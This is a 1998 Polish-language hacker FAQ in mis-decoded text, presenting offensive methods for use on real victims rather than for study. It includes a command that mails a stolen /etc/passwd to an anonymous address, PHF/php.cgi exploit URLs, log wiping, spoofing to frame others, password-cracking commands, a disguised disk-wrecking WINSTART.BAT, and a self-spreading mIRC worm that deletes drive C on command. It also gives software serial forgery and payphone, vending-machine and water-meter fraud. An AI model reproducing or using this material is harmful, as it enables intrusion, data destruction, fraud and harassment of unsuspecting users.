ÚÄÄżÚÄÄÂÄÄÄÄÄÂÄÄÄÄÄÄż ÚÄÄÂÄÄż   ÚÄÄż    ÚÄÄÄÄż   ÚÄÄÄÄÄÄżÚÄÄżÚÄÄÄÄż
     ÚŮŰŰŔŮŰŰłŰŰŰŰŰłŰŰŰŰŰŰłÚŮŰŰłŰŰł   łŰŰł   ÚŮŰŰŰŰŔż  łŰŰŰŰŰŰĂŮŰŰĂŮŰŰŰŰŔż
    ÚŮŰŰŰ ŰŰŰĂÄÄÄÄÂÁÄżŰŰÚÄĹŮŰŰŰłŰŰł   łŰŰł   łŰŰÚżŰŰł  łŰŰ ÄÂÂŮŰŰŰłŰŰÚżŰŰł
   ÚŮŰŰŰŰŰŰŰŰłŰŰŰŰł  łŰŰłÚŮŰŰŰŰłŰŰł   łŰŰł   łŰŰłłŰŰł  łŰŰŰŰĂŮŰŰŰŰłŰŰŔŮŰŰł
  ÚŮŰŰ ŰŰŰ ŰŰĂÄÄÄÄÁż łŰŰĂŮŰŰ ŰŰłŰŰŔÄÄÄ´ŰŰŔÄÄÄ´ŰŰŔŮŰŰł  łŰŰÚÂŮŰŰ ŰŰłŰŰ ŰŰŰŔż
  łŰŰÚżŰŰÚżŰŰłŰŰŰŰŰł łŰŰłŰŰ ŰŰŰłŰŰŰŰŰŰłŰŰŰŰŰŰĂżŰŰŰŰÚŮ  łŰŰłłŰŰ ŰŰŰĂżŰŰŰ ŰŰł
  ŔÄÄŮŔÄÄŮŔÄÄÁÄÄÄÄÄŮ ŔÄÄÁÄÄÄÄÄÄÁÄÄÄÄÄÄÁÄÄÄÄÄÄŮŔÄÄÄÄŮ   ŔÄÄŮŔÄÄÄÄÄÄŮŔÄÄÄÄÄÄŮ

ŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰ

                                  ver. 1.5
                                22 marca 98 
                          polskie znaki: Latin 2

ŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰ

	Witajcie bracia! ťaski WszechmogĄcego niechaj spynĄ na was, a tych
kt˘rzy Jego imi© kalajĄ niechaj pochonĄ czeluci piekielne. Pan z Wami!

	Tekst ten nasta wyĄcznie w celach edukacyjnych i nie ponosz©
odpowiedzialnoci za utrat© dost©pu do Internetu lub czegokolwiek innego w
wyniku stosowania metod tu opisanych, czyli jak ci© kto namierzy i udupi to
miej pretensje do samego siebie a nie do mnie. Jest on o wszystkim po trochu,
tzn. o IRC-u, phreakingu, hackerstwie, Unixie i podobnych sprawach. B©dzie on
stale uaktualniany jak tylko dowiem si© czego ciekawego, co godne
zamieszczenia b©dzie. Cz©† tego FAQ jest mojego autorstwa, a cz©† to texty z
FAQ innych hacker˘w lub zasyszane w r˘ľnych okolicznociach ;)

ŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰ

Spis treci

   1. IRC
      1.1. Jak komu dokopa†
      1.2. Boty
   2. Unix
      2.1. Jak si© wama†
   3. Windoza - zady i walety
      3.1. Winword
      3.2. Plik win.ini
      3.3. Plik winstart.bat
      3.4. Logo windozy
      3.6. Cudowne komendy
      3.7. mIRC i jego skrypty
   4. BIOS-y
   5. Phreaking
      5.1. Budki telefoniczne
         5.1.1. Automaty na ľetony
         5.1.2. Automaty na karty
      5.2. Automaty sprzedajĄce Col©
      5.3. Wodomierze

1. IRC

1.1. Jak komu dokopa†
	Istnieje wiele sposob˘w aľeby komu dokopa† na IRC-u. JednĄ z metod
stosowanych na r˘ľnorakich lamerk˘w jest np. wejscie na query i zaproszenie na
kana #5,0. Kto wejdzie na ten kana zostanie wyrzucony z serwera :). Moľna teľ
wpisa†: /me has invited you to join #5,0 - jak kto jest lamer to nie odr˘ľni
tego od prawdziwego invite ale prawdziwi hackerzy stosujĄ zwykle bardziej
wyrafinowane metody. Moľna teľ kogo sfloodowa† czyli zasypa† go bzdurnymi
tekstami typu "zesraj si© dziadu...", funkcjami CTCP (ping, version, time,
finger, page, userinfo, clientinfo). Co ambitniejsi stosujĄ floodowanie z
kilku sesji - jest bardziej efektywniejsze i zmniejsza zagroľenie wykopania
z serwera za flood. Moľna takľe wykorzysta† WinNuke do namierzenia gocia na
IRC-u i zawieszenie mu komputera :) ale on musi mie† windoz© 95. Jak kto chce
WinNuke to niech mailnie.

1.2. Boty
	Bot jest to program, kt˘ry siedzi na IRC-u i udaje normalnego usera.
Ma on jednak wbudowane r˘ľne funkcje np. autokick za flood lub za wulgaryzmy,
autoop, protect i tak dalej. O stawianiu bota na razie nie b©d© si© rozpisywa†,
napisz© tylko, ľe aby postawi† takiego bota, trzeba mie† konto unixowe.
Niekt˘re boty wymagajĄ takľe zainstalowanego klienta IRC na tym koncie. To by
byo na razie o stawianiu bot˘w, wi©cej moľecie si© dowiedzie† z plik˘w readme
doĄczonych do konkretnego bota. Teraz moľe co o rozwalaniu wyľej
wymienionych. No wi©c jeli bot jest gupi, moľna go spr˘bowa† zfloodowa† z
kilku sesji - niekt˘re wyrzucajĄ na kana texty w stylu " Floodujesz mnie
synu...", albo wchodzimy z np. trzech sesji, z kaľdej czynimy "/CTCP VERSION
bot" po 50 razy (ľeby nas nie wywalio) a p˘«niej "/IGNORE bot". Jeli uda si©
go sfloodowa† w ten spos˘b bot b©dzie praktycznie cay czas rzuca tymi textami
lub odpowiada na VERSION i w koäcu go wywiozĄ z serwera za flood :)

2. Unix

2.1. Jak si© wama†
	Aby wama† si© do serwera Unixowego i pozna† czyje haso, lub
uzyska† konto niekoniecznie z akceptacjĄ szanownego administratora, naleľy
zdoby† plik /etc/passwd na tym serwerze lub dopisa† si© do niego. Dobrze jest
mie† zaoľony jaki lewy e-mail do cel˘w hackerskich gdzie na polboksie,
hotmailu, geocities, kki lub czym podobnym. Uľyj zmylonych personali˘w
(imi©/nazwisko/adres). Moľesz teľ uľy† iname (www.iname.com) jako
"redirectora" - jak masz np. maila izydor@polbox.com to moľesz sobie zaoľy†
np. izydor@writeme.com, izydor@polandmail.com, izydor@2die4.com,
izydor@2sexy4u.com... (jak kto tam napisze, to mail zostanie posany dalej na
polbox) lub jaki inny mao znaczĄcy - trzeba si© nie«le nam©czy† ľeby zobaczy†
imi©, nazwisko i prawdziwy e-mail, a ten i tak jest anonimowy :). Opr˘cz tego,
jeli haczycie z dial-up˘w (dzwonicie przez modem do jakiego providera) to
jest to wysoce karalne - administrator zobaczy ľe jaki czowieczek
np. izydor@dial-79.supermedia.pl ciĄgnĄ passwd i co dalej? Ot˘ľ ten to admin
pisze sobie maila do administratora Supermedii, i namierza, kt˘ľ to jest ten
izydor. Moľna za to w najlepszym przypadku straci† konto. Wi©c najlepiej
korzysta† z darmowego dial-upu tpsa (suxx, ale do hackerstwa wystarczy).
Jak admin zobaczy w logach noname@ppp-86.warszawa.tpnet.pl to ci wiele nie
zrobi, ale jak sie uprze, to potrafi ci© namierzy†. Moľna jeszcze robi† tak:
zhaczy† zobie np. trzy serwery, na kaľdym po kilka kont. P˘«niej telnetowa†
si© na pierwszy, przez pierwszy na drugi, p˘«niej na trzeci, p˘«niej zn˘w na
pierwszy, ale pod innym kontem... uczyni† takĄ p©telk©, p˘«niej np. zrzuci†
passwd, zrobi† przemeblowanie na serwerze, a p˘«niej wycofywa† si© z p©tli - 
jak telnetujesz si© np. do Francji, z Francji do Finlandii, p˘«niej jeszcze do
USA i przez USA do Polski to zanim dojdĄ kto si© wama minie p˘ roku ;)

* Metody zdobycia pliku passwd

Gdy masz konto:
- Telnetujesz si© na serwer, logujesz si© i piszesz "cat /etc/passwd" i
wywietla si© ten plik (jeli akurat masz dost©p do niego, np. jeste rootem,
albo jest udost©pniony dla wszystkich). SĄ specjalne programiki do "bycia
rootem" wykorzystujĄce r˘ľnorakie dziury w systemie, a zowiĄ si© one 
exploitami. Wyst©pujĄ one w duľych ilociach na rootshellu (www.rootshell.com).
Moľna jeszcze ewentualnie uczyni† to tak: 
"cat /etc/passwd | mail inydor@writeme.com" (korzystamy z redirectora)
P˘«niej odbieramy mejle i dostajemy plik /etc/passwd prosto do skrzynki
pocztowej.

Gdy nie masz konta:
- Uruchamiasz FTP, wpisujesz adres serwera, login ftp (lub anonymous), 
w password zalecajĄ podanie adresu e-mailowego ale podaj jaki zmylony lub
sam znak @ (b©dzie w logach) i piszesz "get /etc/passwd". Uwaga - ta metoda
dziala bardzo rzadko (na lamerskich serwerach, z takimiľ adminami), w innych
przypadkach passwd jest falszywy, albo zshadowany, albo jedno i drugie ;)

- Metoda PHF - wpisz w browserze:
http://www.tu.wpisz.serwer.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

- Metoda PHP - wpisz w browserze:
http://www.tu.wpisz.serwer.com/cgi-bin/php.cgi?/etc/passwd

Te dwie metody nie dziaajĄ na wszystko, ale moľna popr˘bowa†, jak admin jest
lamerkiem i nie chce mu si© instalowa† nowszych wersji program˘w, moľna si©
spr˘bowa† pobawi†.

*** UWAGA! ***
W/w metody majĄ jednĄ wad©: wszystko jest logowane, to znaczy ľe jak wykupie
sobie np. konto na Polska Online i od razu zrzucasz sobie passwd, lub co
kr©cisz, to jest to zapisywane do specjalnych plik˘w (log˘w). Moľna stosowa†
czyszczenie log˘w (np. killog), korzysta† z lewego maila (patrz kilka pi©ter
wyľej), lub spoofowa† - np. jak jestemy przez tpsa, to uruchamiamy spooferka i
udajemy poĄczenie np. z www.zgroza.com.pl. Ma to jednak duľĄ wad© - jest to
"blind spoofing" wi©c serwer-ofiara nie wysya informacji na tw˘j ekran, tylko
z uporem maniaka wszystko le na www.zgroza.com.pl. Ale wama† si© moľna.
Moľna pr˘bowa† takich rzeczy jak "cat /etc/passwd | mail izydor@writeme.com" -
admin nie namierzy, bo w logach zobaczy www.zgroza.com.pl, no wi©c le maila na
root@zgroza.com.pl i... po max. dziesi©ciu minutach mail przychodzi z powrotem
z dopiskiem "adresat nieznany" :). Moľna tak narobi† chay komu, kogo nie
lubimy - po prostu zostawiamy go w logach... biedne dziecko.

* Co dalej?

Linijka z pliku passwd wyglĄda tak:

root:z1YAmW5ZwE7qQ:0:0:root:/root:/bin/bash

I jest uczyniona wedug tego wzoru:

login:zakodowane haso:numer uľytkownika:numer grupy:opis:katalog domowy:shell

Jeli zamiast hasa jest x, lub gwiazdka *, spr˘buj wstuka† /etc/shadow zamiast
/etc/passwd, ale moľe nie zadziaa†. Ale jeli juľ masz ten plik, odkoduj go.
Aby odkodowa† haso naleľy mie† program do tego celu, jak np. John the Ripper
pod DOS. Uruchamianie:

john -pwfile:[plik z hasami] -single

lub druga metoda (wymaga sownika)
john -pwfile:[plik z hasami] -wordfile:[sownik]

moľna jeszcze tak:

john -pwfile:[plik z hasami] -wordfile:[sownik] -rules
UWAGA! to dziaa tylko w Johnie 1.4.

Jak co znajdzie to wywietli, a potem... telnetujesz si© i logujesz tak, jak
ci poda John :) Jak zamae haso roota moľesz sobie poczyta† jego poczt©,
poformatowa† dyski - root ma duľe moľliwoci w systemie. Jak kto chce Johna
to niech mailnie.

3. Windoza - zady i walety

3.1. Winword

Dopisa† komu do skr˘tu zamiast "winword.exe" "winword.exe -mFileExit".
Word zacznie prac© od jej skoäczenia :). Dziaa na Worda 6.0 i 7.0, na Word97
nie sprawdzaem bo nie mam :P

3.2. Plik win.ini

Zmieni† komu linijk© "shell=progman.exe" (win 3.1x) na "shell=calc.exe" -
zamiast Menedľera Program˘w na poczĄtku wĄczy si© kalkulator :) Moľna teľ
wstawi† jaki inny programik typu pbrush.exe - jak kto b©dzie chcia zrobi†
co innego niľ rysowanie to si© mocno zawiedzie - zamkni©cie shella koäczy
windoz© :) W win95 shellem jest explorer.exe, ale nie manipulowaem przy nim
jeszcze, bo mnie si© nie chciao.

3.3. Plik winstart.bat

Plik ten naleľy umieci† w katalogu Windows. Jest on uruchamiany przy starcie
windozy - moľna dopisa† tam jakie bzdury, szlaczki, krzaczki, melodyjki,
pi©tnacie Word˘w czy inne wielce przydatne rzeczy. Moľna teľ tam dopisa†
program pod tytuem FLEX - zrzucajĄcy naciskane klawisze na dysk - przydaje si©
jak kto ma Windows na haso lub si© loguje do jakiego Novella. Jak kto go
chce to niech mailnie. Jeli was to nie satysfakcjonuje, w tymľe pliku moľna
jeszcze uczyni† co, aby kasowao gociowi np. win.ini, albo win.com, albo
co takiego:

--- WINSTART.BAT ---
@echo off
echo Verifying your system, please wait...
rem to dla zachowania pozor˘w, ľe windoza sobie co sprawdza...
copy c:\config.sys c:\dos
copy c:\autoexec.bat c:\dos
rem robimy lamuchowi kopi© zapasowĄ, gdyľ mamy lito† nad zwierz©tami
echo System verified.
echo Synchronizing drive C:
echo Do not interrupt this operation!
echo DAMAGED BOOT SECTOR, DISK UNUSABLE > config.sys
rem teraz wpisujemy gupoty do config.sys
echo dir c:\ /s > autoexec.bat
rem a teraz do autoexec.bat - to spowoduje ľe przy starcie systemu b©dzie si©
rem wywietlaa zawarto† dysku C: (wszystkie pliki w kaľdym katalogu)
echo call autoexec.bat >> autoexec.bat
rem a teraz wywoujemy jeszcze raz autoexec, ľeby si© za szybko nie skoäczyo
rem po tej linijce dir c:\ /s b©dzie wykonywao si© nieskoäczonĄ ilo† razy,
rem dop˘ki kto nie przerwie... a jak przerwie to system wykona polecenie
rem "call autoexec.bat" i od nowa Polska ludowa... :)
echo Drive C: synchronized, loading Windows now...
--- WINSTART.BAT ---

Wiersze zaczynajĄce si© od "rem" to komentarze, moľesz je spokojnie wywali†.

3.4. Logo windozy

*** dla wersji 3.1x ***

No wi©c jest plik win.com i on zawiera w sobie logo. A co by byo jakby
jakiemu lamuchowi zmieni† to logo na co innego - np. napis "Killer Virus
Activated - Destroying in progress..." ? Wi©kszo† takich lamerk˘w panicznie
boi si© wirus˘w, wi©c nasz lamuch w panice zacznie resetowa† komputerek, a jak
kto resetuje komputer podczas adowania windozy to moľe si© to «le skoäczy†
:>. Logo jest w formacie RLE - to taki jaki obskurny format graficzny,
obsuguje go na przykad Graphics Workshop. Jeli chcecie zmienia† orginalne
logo - jest ono w podkatalogu system, nazywa si© vgalogo.rle. No wi©c wĄczamy
jaki program malarski, piszemy np. napisik straszĄcy. I co dalej? W 
podkatalogu system jest plik win.cnf. Jest to plik, kt˘ry moľe zast©powa† 
win.com, ale jest od niego nieco mniejszy - brakuje mu logo. PrzyjmujĄc, ľe
nowe logo naszego autorstwa nazywa si© lame.rle i jest w katalogu system, 
piszemy tak:

C:\WINDOWS\SYSTEM>copy /b win.cnf +lame.rle ..\win.com

Po takim zabiegu uczyni si© nowy win.com, zawierajĄcy nasze logo. Stary moľemy
sobie uprzednio zasejwowa† pod innĄ nazwĄ lub przywr˘ci† tak:

C:\WINDOWS\SYSTEM>copy /b win.cnf +vgalogo.rle ..\win.com

I juľ. Lamerka moľna nie«le nastraszy†. Tylko nie przesad«cie - plik win.com
moľe mie† najwyľej 64 KB, p˘«niej mogĄ nastĄpi† problemy...

*** dla windozy 95 ***

Defaultowe logo tym razem nie wiem gdzie jest, bo nie chciao mi si© sprawdza†
:P Ale jeli uczynimy sobie bitmapk© o rozmiarach 320 na 400, w 256 kolorkach,
z zawartociĄ podobnĄ jak pi©tro wyľej, i zasejwujemy jĄ jako C:\LOGO.SYS, to
wanie ona wywietli si© przy starcie tego jakľe wspaniaego systemu...
Huh. Moľna jeszcze zmieni† lamuchowi bitmapy C:\WINDOWS\LOGOW.SYS (poczekaj na
zamkni©cie systemu) i C:\WINDOWS\LOGOS.SYS (Moľna teraz bezpiecznie wyĄczy†
komputer). Przy zamykaniu systemu, windoza sejwuje r˘ľne swoje pliczki. No wi©c
napis o wirusie wstawiamy do LOGOW.SYS i... huh.

3.5. Numery seryjne M$

Kiedy instalujesz kolejny wspaniay wytw˘r znanej na caym wiecie firmy
Mikro$oft, przychodzi moment, ľe installer pyta ci© o kod. A co uczyni† jeli,
hmm, powiedzmy ľe ten to kod zapomniae spisa† od kumpla, lub nie istnia
w pudeku z programem (bo nie mia pudeka), ani w instrukcji (bo ľadnej
instrukcji nie byo), a cracka na razie nie ma? No wi©c jeli kod jest w formie
XXXX-XXXXXXXX to wpisz 1234-12345467 - powinno zadziaa†. Kody w postaci
XXX-XXXXXXX sĄ zbudowane w nast©pyjĄcy spos˘b: trzy pierwsze cyfry sĄ dowolne,
a suma nast©pnych musi by† podzielna od 7 i wi©ksza od 7, czyli moľna wpisa†
000-4031337. IstniejĄ jeszcze numerki, kt˘re sĄ uczynione na ten wz˘r:
XXXXX-OEM-XXXXXXX-XXXXX. Zasada jest nast©pujĄca: trzy dowolne cyfry, p˘«niej
95, 96 lub 97 (rok produkcji, np. dla win osr2-97, dla osr1-96, dla 
zwykych-95), suma nast©pnych siedmiu musi by† podzielna przez 7 i wi©ksza od 7
(jw.), a ostatnie pi©† cyfr jest dowolne, no wi©c przykadowy numerek b©dzie
wyglĄda tak: 83696-OEM-4031337-89364. Huh, mam nadziej© ľe komu pomogem.

3.6. Cudowne komendy

IstniejĄ sobie komendy, kt˘re warto wykona† zdalnie przez windoz© jakiemu
lamuchowi. JednĄ z nich jest "DELTREE C: /Y" - kasuje cay dysk. Moľna teľ np.
pozby† si© lamucha np. z IRC-a, czyniĄc mu takĄ oto komend©
"RUNDLL32 User,ExitWindows" - windoza elegancko si© zamyka. Komendy takie
moľna czyni† np. przez strony WWW - o tem potem, w nast©pnej wersji FAQ, bo
teraz mi si© nie chce pisa†. :)

3.7. mIRC oraz jego skrypty

No wi©c jest sobie taki przeci©tny programik do ircowania. Nazywa si© mIRC.
Zajmuj© si© nim dlatego, ľe od pewnego czasu na IRC-u grasuje pewien skrypt.
Jest on samo-rozmnaľajĄcy si© (sam si© rozsya jak kto wchodzi/wychodzi na
kana na kt˘rym jest zainfekowany). Cay dowcip jest w tym, ľe jako jeden z
plik˘w skryptu do mIRC-a jest ustawiony SCRIPT.INI. No wi©c ten to skrypcik
wanie tak si© nazywa. Opr˘cz tego jako domylny katalog odbioru dcc jest
ustawiony katalog, gdzie jest mIRC (np. C:\MIRC), a tam teľ rezyduje
SCRIPT.INI... No wi©c jeli wylemy taki skrypt lamerkowi, kt˘re ma AutoGet,
to zarazimy go. Moľemy teľ mu troch© naciemnia†, np. tak:

 cze!
 cze
 chesz moj skrypt pod mIRC-a?
 a do czego to jest?
 huh... no dobra jesli ktos cie zabanowal i wykopal, to ty mozesz
sam sie odbanowac i wyrzucic go z IRC-a
 wow
 super
 daj!
 ok :)
 lap
/DCC SEND lamuch SCRIPT.INI
 mam, co teraz zrobic?
 teraz przegraj go tam gdzie jest mirc32.exe
 dzieki!
 :)

Dobra, teraz moľe co o budowie tego skryptu...

--- SCRIPT.INI ---
[script]
n0=;----------------------------------------------------------
n1=;      NeoScript ver. 997, (C) 1939 by Adolf H.
n2=;----------------------------------------------------------
n3=ON 1:TEXT:!UMRZYJ!:*:/quit jestem lamerem
n4=;jezeli ktos napisze !UMRZYJ! - lamera wyrzuca z IRC-a
n5=ON 1:TEXT:!KASUJ!:*:/run DELTREE C: /y
n6=;reakcja na !KASUJ! - kasacja dysku C:
n7=ON 1:TEXT:!EXITWIN!:*:/run RUNDLL32 User,ExitWindows
n8=;zamykamy lamerkowi windoze na odleglosc
n9=ON 1:JOIN:#:{
n10=  if ( $nick != $me ) { /dcc send $nick $mircdirscript.ini
n11=  }
n12=}
n13=;rozmnazanie skryptu, jesli ktos wchodzi na kanal dostaje go
n14=ON 1:TEXT:!PIERDOLEC!:*:/msg $nick mam pierdolca
n15=;info - kto jest zainfekowany ten odpowie
n16=ON 1:TEXT:!DAWAJOPA!:?:/mode $chan +o $nick
n17=;no comment
n18=ON 1:TEXT:!KOP!:?:/ban $me | /kick # $me
n19=;lamer sam sie kopie
n20=ON 1:TEXT:IDIOTA:*:/amsg jestem idiota i zasranym debilem
n21=ON 1:TEXT:LAMER:*:/ame to LAMER!
n22=ON 1:TEXT:BLUZGAJ:*:/amsg kurwa cholera huj chuj dupa jebana pizda
n23=ON 1:TEXT:MATKA:/amsg moja matka to kurwa
n24=;to sluzy do robienia kichy lamerowi
--- SCRIPT.INI ---

Jak bedziecie to rozpowszechniac to wytnijcie moje komentarze - te zaczynajĄce
si© od rednika. Myl© ľe to jest zrozumiae.

4. BIOS-y

Jeľeli masz AWARD BIOS-a na haso moľesz wpisa† kilka tzw. unihase (wymyliem
nowe sowo) : Zbgn, zbg, AWARD_SW, >AWARD<, condo. Na AMI BIOS-y niekiedy
dziaa unihaso ami. Dla Phoenix BIOS unihaso to czasem 1234 lub 1234567.
Opr˘cz unihase na AMI BIOS jest jeszcze jedna metoda - AMI Decode. Jest to
program wydubujĄcy haso z tego BIOS-u, ale najpierw kto musi ono wpisa†.

5. Phreaking

5.1. Budki telefoniczne

Moľna wpiĄ† si© telefonem w kabel przy budce - ale nie r©cz© za skutki -
podobno telekomunici to wykrywajĄ i p˘«niej w©drujĄ do budki oraz sprawdzajĄ.
Moľna teľ zdoby†/uczyni† telefon taki jak majĄ monterzy - suchawka z tarczĄ
(do wybierania) - ľeby by mniejszy. SĄ dwie metody: ciachnĄ† kabelek i
podĄczy† sw˘j telefon, albo na koäcu kabla przylutowa† igy i wpina† si©
poprzez izolacj©.

5.1.1. Automaty na ľetony

- Wrzuci† 5 gr. jako ľeton A - na niekt˘re jeszcze dziaa.

- Przywali† nad otw˘r zwrotu ľetonu - zaliczy impuls.

- Woľy† yľk© do zwrotu ľeton˘w i pomanipulowa† - zrobi si© zwarcie i zaliczy
  impuls.

- Strzeli† iskrĄ z zapalarki piezoelektrycznej do gazu w tarcz© automatu.

5.1.2. Automaty na karty

- Zdobywanie kart: zablokowa† miejsce wypadku kart papierem, foliĄ, zuľytĄ
  kartĄ, gumĄ do ľucia z zapakami lub checzĄ - karty nie wypadajĄ. Po«niej
  przyj† wieczorkiem i wyduba† wszystko co tam zostao. Jednakľe osoby
  proceder ten uprawiajĄcy powinny blokad© przyklei†, albowiem automat wyrzuca
  karty z pewnĄ siĄ, kt˘ra moľe okaza† si© za duľa i nasz  papier moľe
  wylecie† razem z kartĄ, a chyba nie to byo w planie. :)

- Fakeowanie kart: naklei† na nie do koäca zuľytĄ kart© tam© video -
  rozmagnesuje tam© zamiast karty. P˘«niej odklei† i naklei† nowĄ. Moľna
  jeszcze kart© usmarowa† lakierem. Praktykowana jest takľe taka metoda: 
  odczyta† sygna z dobrej karty i nagra† go na zuľytĄ, ale do tego trzeba mie†
  wrodzone zdolnoci ;)

- Numer 6230015 - z budki na kart© - pacisz 18gr za 3min i dostajesz sygna
  czyli moľesz dzwoni† dalej, np. na 0700.

5.2. Automaty sprzedajĄce Col©

- Naleľy wrzuci† stare 20 z i kupi† puszk© jakiej cieczy - automat wr©czy ci
  puszk© oraz wspaniaomylnie wyda reszt© z pi©ciu z.

5.3. Wodomierze

- Moľna odkr©ci† np. wod© w wannie tak, aľeby kapaa po kropelce, po czym i†
  sobie do szkoy, a jak wr˘cimy, to mamy caĄ wann© wody a wodomierz nawet nie
  drgnie, albo leciutko zmieni si© jego wskazanie, co jest lepsze od burzliwego
  napeniania wanny H2O ;)

ŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰ

                                 * Koniec *

Greetingsy dla: przede wszystkim ludzi, z kt˘rych materia˘w korzystaem przy
                produkcji tekstu powyľszego. Pan z wami!

Jeli ten FAQ zawiera jakie niecisoci lub bzdury, lub jeli masz co
ciekawego, godnego zamieszczenia, napisz do mnie na metallo@kki.net.pl.

ŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰ